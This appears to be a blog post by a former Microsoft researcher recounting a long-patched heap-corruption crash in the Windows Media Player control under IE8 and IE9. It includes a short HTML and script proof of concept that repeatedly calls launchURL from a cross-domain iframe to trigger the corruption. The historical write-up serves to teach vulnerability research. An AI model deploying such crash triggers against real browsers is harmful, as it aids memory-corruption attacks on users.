EoP: Windows Media Player launchURL Crash via Intentional Failure

This crash required an unusual setup: the Windows Media Player control in an iFrame on a different domain from the top window, calling launchURL repeatedly in a way that would always fail to navigate. The failure path — not the success path — was what triggered the heap corruption. On IE8, the result was a clear DEP violation rated EXPLOITABLE; on IE9, it was rated UNKNOWN.

<!-- iframe.html (hosted on a different domain) -->
<object id="oWMP" classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6" width="10" height="10">
    <param name="URL" value="dummy.wmv">
</object>

<script>
// Called repeatedly until crash
document.all.oWMP.launchURL('http://www.bing.com&&_parent');
</script>

The trick is to place the WMP control in a cross-domain iFrame. When launchURL attempts to navigate the top-level window but fails because of the domain mismatch, it hits an error path in MSHTML’s CMarkup cleanup code that corrupts the heap. Calling it multiple times in succession is enough to turn the latent corruption into an access violation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [WMP Popup Blocker Bypass via scriptcommand in WMV or launchURL] :: [IE8: User Style Sheet Bug Crashes on SELECT Element Expansion] >